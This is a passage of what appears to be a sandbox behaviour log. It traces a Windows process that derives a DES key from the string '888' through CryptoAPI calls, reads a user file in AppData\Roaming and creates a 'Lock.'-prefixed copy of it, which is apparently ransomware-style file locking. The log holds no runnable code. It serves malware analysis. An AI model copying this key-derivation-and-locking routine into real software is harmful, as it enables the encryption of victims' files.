lpsz="SSA5C00800A45") returned 0xd [0149.690] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.690] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.690] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.690] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.690] CryptCreateHash (in: hProv=0x9be9a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.690] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ae8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.690] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.690] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa240, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.691] CryptHashData (hHash=0x9e1e38, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.691] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.691] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.691] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.691] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa450, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.691] CryptDeriveKey (in: hProv=0x9be9a0, Algid=0x6601, hBaseData=0x9e1e38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0149.691] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.691] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.691] CryptDestroyHash (hHash=0x9e1e38) returned 1 [0149.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Pvmhff.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pvmhff.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.692] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.692] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0149.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0149.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0149.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0149.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.694] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0149.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Pvmhff.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.pvmhff.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.695] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.695] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.695] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0149.695] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0149.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdb020 [0149.699] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.699] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0149.702] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x5b38, lpOverlapped=0x0) returned 1 [0149.702] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15b38) returned 0x2aaf410 [0149.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdb020 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15b38) returned 0x2ac4f50 [0149.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15b38) returned 0x2aaf410 [0149.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0149.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0149.711] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15b38) returned 0x2aaf410 [0149.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa180 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 